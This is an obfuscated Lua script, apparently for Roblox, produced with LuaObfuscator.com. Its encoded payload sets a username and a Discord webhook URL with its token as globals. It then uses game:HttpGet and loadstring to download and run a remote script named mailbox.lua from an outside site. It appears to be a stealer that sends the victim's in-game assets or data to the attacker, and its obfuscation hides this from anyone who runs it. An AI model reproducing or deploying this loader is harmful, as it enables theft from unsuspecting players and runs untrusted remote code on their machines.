--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==0) then v84=(v31/((5 -3)^(v32-1)))%((3 -(1638 -(1523 + 114)))^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v84-(v84%(932 -(771 + 86 + 74))) ;end end else local v85=0;local v86;while true do if (v85==(568 -(367 + 201))) then v86=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1066 -(68 + (2377 -1380)))) then return (v38 * (16778486 -(226 + (1929 -885)))) + (v37 * (285370 -219834)) + (v36 * (373 -(32 + 85))) + v35 ;end if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (1 -0) + 2 );v19=v19 + 4 ;v34=958 -(892 + 65) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==(1851 -(1409 + 441))) then v42=nil;v43=nil;v39=720 -(15 + 703) ;end if (v39~=0) then else v40=1500 -(1408 + 92) ;v41=nil;v39=1;end if ((1088 -(461 + 625))==v39) then v44=nil;v45=nil;v39=3;end if (v39~=(2 + 1)) then else v46=nil;while true do local v94=0;local v95;while true do if (v94~=(1288 -(993 + 295))) then else v95=0 + 0 ;while true do if (v95==0) then local v110=438 -(262 + 176) ;while true do if (1==v110) then v95=1722 -(345 + 1376) ;break;end if (v110~=(688 -(198 + 490))) then else if (v40==(8 -6)) then local v161=0 + 0 ;while true do if (v161~=0) then else local v164=0 -0 ;while true do if (v164~=(1207 -(696 + 510))) then else v161=1 -0 ;break;end if (v164==(1262 -(1091 + 171))) then for v171=1 + 0 ,v45 do local v172=1769 -(1749 + 20) ;local v173;local v174;local v175;while true do if ((0 + 0)~=v172) then else v173=1322 -(1249 + 73) ;v174=nil;v172=1 + 0 ;end if (v172~=(1146 -(466 + 679))) then else v175=nil;while true do if (v173==1) then if (v174==(3 -2)) then v175=v22()~=(0 -0) ;elseif (v174==2) then v175=v25();elseif (v174==3) then v175=v26();end v46[v171]=v175;break;end if (0~=v173) then else v174=v22();v175=nil;v173=3 -2 ;end end break;end end end v44[377 -(123 + 251) ]=v22();v164=4 -3 ;end end end if (v161==1) then for v166=1,v24() do local v167=698 -(208 + 490) ;local v168;local v169;while true do if (v167==1) then while true do if (v168~=(1900 -(106 + 1794))) then else v169=v22();if (v21(v169,1 + 0 ,1 + 0 )==0) then local v178=0 + 0 ;local v179;local v180;local v181;local v182;local v183;local v184;while true do if (v178~=(8 -5)) then else while true do if (v179==0) then local v186=0 -0 ;while true do if ((0 + 0)~=v186) then else v180=836 -(660 + 176) ;v181=nil;v186=1;end if (v186==(1 + 0)) then v179=203 -(14 + 188) ;break;end end end if (v179==1) then v182=nil;v183=nil;v179=677 -(534 + 141) ;end if (v179~=2) then else v184=nil;while true do if (2==v180) then while true do if (v181~=(2 + 1)) then else if (v21(v183,3 + 0 ,3 + 0 )==(1 -0)) then v184[5 -1 ]=v46[v184[11 -7 ]];end v41[v166]=v184;break;end if ((2 + 0)~=v181) then else local v191=0 + 0 ;local v192;while true do if (v191==0) then v192=0;while true do if ((166 -(122 + 44))~=v192) then else if (v21(v183,1 -0 ,1)==1) then v184[6 -4 ]=v46[v184[2 + 0 ]];end if (v21(v183,1 + 1 ,3 -1 )~=(397 -(115 + 281))) then else v184[68 -(30 + 35) ]=v46[v184[6 -3 ]];end v192=1 + 0 ;end if (v192~=(2 -1)) then else v181=10 -7 ;break;end end break;end end end if (v181~=(3 -2)) then else local v193=0;local v194;while true do if ((867 -(550 + 317))~=v193) then else v194=0 -0 ;while true do if (v194==(0 -0)) then v184={v23(),v23(),nil,nil};if (v182==(0 -0)) then local v204=1990 -(582 + 1408) ;local v205;local v206;while true do if (v204==1) then while true do if (v205~=(0 + 0)) then else v206=0;while true do if (v206==(0 -0)) then v184[3 -0 ]=v23();v184[15 -11 ]=v23();break;end end break;end end break;end if (v204~=(1824 -(1195 + 629))) then else v205=0 -0 ;v206=nil;v204=1;end end elseif (v182==1) then v184[244 -(187 + 54) ]=v24();elseif (v182==(2 + 0)) then v184[3]=v24() -((782 -(162 + 618))^16) ;elseif (v182~=(3 + 0)) then else local v209=126 -(116 + 10) ;while true do if (v209~=0) then else v184[2 + 1 ]=v24() -((3 -1)^(26 -10)) ;v184[4]=v23();break;end end end v194=1 + 0 ;end if (v194~=1) then else v181=1638 -(1373 + 263) ;break;end end break;end end end if (v181==(1000 -(451 + 549))) then local v195=0 + 0 ;local v196;while true do if (v195~=0) then else v196=0 -0 ;while true do if (v196~=(1 -0)) then else v181=1385 -(746 + 638) ;break;end if (v196==(0 -0)) then local v199=0;while true do if (v199==(1 + 0)) then v196=1 + 0 ;break;end if ((0 + 0)~=v199) then else v182=v21(v169,1 + 1 ,4 -1 );v183=v21(v169,345 -(218 + 123) ,1587 -(1535 + 46) );v199=406 -(118 + 287) ;end end end end break;end end end end break;end if (v180==(1 + 0)) then local v187=0;while true do if (v187==(1 + 0)) then v180=2;break;end if (v187==0) then v183=nil;v184=nil;v187=561 -(306 + 254) ;end end end if (v180==(0 + 0)) then local v188=0 -0 ;local v189;while true do if (v188==(0 -0)) then v189=0 + 0 ;while true do if (v189~=1) then else v180=1;break;end if (v189==(1467 -(899 + 568))) then v181=0 + 0 ;v182=nil;v189=1;end end break;end end end end break;end end break;end if ((4 -2)==v178) then v183=nil;v184=nil;v178=5 -2 ;end if (v178~=(1 + 0)) then else v181=nil;v182=nil;v178=2;end if (v178==0) then v179=603 -(268 + 335) ;v180=nil;v178=1;end end end break;end end break;end if (v167==0) then v168=0 + 0 ;v169=nil;v167=291 -(60 + 230) ;end end end v40=575 -(426 + 146) ;break;end end end if (v40~=(0 + 0)) then else v41={};v42={};v43={};v40=1 + 0 ;end v110=1457 -(282 + 1174) ;end end end if ((2 -1)==v95) then if (v40~=1) then else local v128=0 -0 ;while true do if (v128==1) then v46={};v40=813 -(569 + 242) ;break;end if (v128~=(0 -0)) then else v44={v41,v42,nil,v43};v45=v24();v128=4 -3 ;end end end if (v40~=(756 -(239 + 514))) then else local v129=1024 -(706 + 318) ;local v130;while true do if (v129==(0 + 0)) then v130=1329 -(797 + 532) ;while true do if (v130~=(0 + 0)) then else local v165=1251 -(721 + 530) ;while true do if (v165~=(1271 -(945 + 326))) then else for v176=2 -1 ,v24() do v42[v176-(1 + 0) ]=v29();end return v44;end end end end break;end end end break;end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1;local v50=(v21(v48,1203 -(373 + 829) ,751 -(476 + 255) ) * ((1132 -(369 + 761))^32)) + v47 ;local v51=v21(v48,13 + 8 ,31);local v52=((v21(v48,57 -25 )==((1 + 0) -0)) and  -1) or (239 -(64 + 174)) ;if (v51==((1975 -(1913 + 62)) + 0)) then if (v50==(0 -0)) then return v52 * ((212 + 124) -((380 -236) + 192)) ;else local v96=216 -(42 + 174) ;while true do if (((1933 -(565 + 1368)) + 0)==v96) then v51=1 + 0 ;v49=0 + 0 ;break;end end end elseif (v51==2047) then return ((v50==(1504 -(363 + (4290 -3149)))) and (v52 * (((3242 -(1477 + 184)) -(1183 + 397))/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/((5 -3)^(39 + 13)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then local v87=0 + 0 ;while true do if (v87==((659 + 197) -(564 + 292))) then v53=v24();if (v53==(0 -0)) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -(2 -1) );v19=v19 + v53 ;local v55={};for v67=305 -(244 + 60) , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=476 -(41 + 435) ;local v57;while true do if (v56==(1001 -(938 + 63))) then v57=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v56=1126 -((2549 -(1565 + 48)) + 189) ;end if (v56==(1 + 0)) then return v57;end end end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (1140 -(782 + 356)) ;return (v59 * (523 -(176 + 91))) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v88=0;while true do if (v88==0) then v20=v0(v3(v60,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v60,16));if v20 then local v101=v5(v90,v20);v20=nil;return v101;else return v90;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v91=0,v77 do if (v91>=v71) then v75[v91-v71 ]=v76[v91 + 1 ];else v79[v91]=v76[v91 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]]=v81[3];elseif (v82==1) then local v111=v81[2];v79[v111]=v79[v111](v13(v79,v111 + 1 ,v74));else v79[v81[2]]=v63[v81[3]];end elseif (v82<=3) then local v104=0;local v105;local v106;local v107;local v108;while true do if (v104==1) then v74=(v107 + v105) -1 ;v108=0;v104=2;end if (v104==0) then v105=v81[2];v106,v107=v72(v79[v105](v13(v79,v105 + 1 ,v81[3])));v104=1;end if (v104==2) then for v131=v105,v74 do v108=v108 + 1 ;v79[v131]=v106[v108];end break;end end elseif (v82>4) then do return;end else v63[v81[3]]=v79[v81[2]];end elseif (v82<=8) then if (v82<=6) then v73=v81[3];elseif (v82==7) then local v117=0;local v118;local v119;while true do if (v117==1) then v79[v118 + 1 ]=v119;v79[v118]=v119[v81[4]];break;end if (v117==0) then v118=v81[2];v119=v79[v81[3]];v117=1;end end else local v120=0;local v121;local v122;local v123;local v124;local v125;while true do if (1==v120) then v73=v73 + 1 ;v81=v69[v73];v125=v81[2];v124=v79[v81[3]];v79[v125 + 1 ]=v124;v120=2;end if (v120==5) then v81=v69[v73];v125=v81[2];v79[v125]=v79[v125](v13(v79,v125 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v120=6;end if (v120==0) then v121=nil;v122,v123=nil;v124=nil;v125=nil;v79[v81[2]]=v63[v81[3]];v120=1;end if (v120==2) then v79[v125]=v124[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v120=3;end if (3==v120) then v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v125=v81[2];v120=4;end if (v120==4) then v122,v123=v72(v79[v125](v13(v79,v125 + 1 ,v81[3])));v74=(v123 + v125) -1 ;v121=0;for v159=v125,v74 do local v160=0;while true do if (v160==0) then v121=v121 + 1 ;v79[v159]=v122[v121];break;end end end v73=v73 + 1 ;v120=5;end if (v120==6) then v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];break;end end end elseif (v82<=9) then v79[v81[2]]();elseif (v82>10) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]=v81[3]~=0 ;end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030A3O004D656E7461723O793203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132363437363734373530393037312O38342F5052534E543168722O4C51624C38437A6D7178387064736D7148384D37735276515F546B6975773643763773783978322O6459582O50787165796A49542O43747877704B001D3O00124O00013O00260B3O000C000100020004063O000C0001001202000100033O001208000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001C000100260B3O0001000100010004063O0001000100122O000100013O00260B00010016000100010004063O0016000100122O000200083O001204000200073O00122O0002000A3O001204000200093O00122O000100023O00260B0001000F000100020004063O000F000100124O00023O0004063O000100010004063O000F00010004063O000100012O00053O00017O00",v9(),...);end
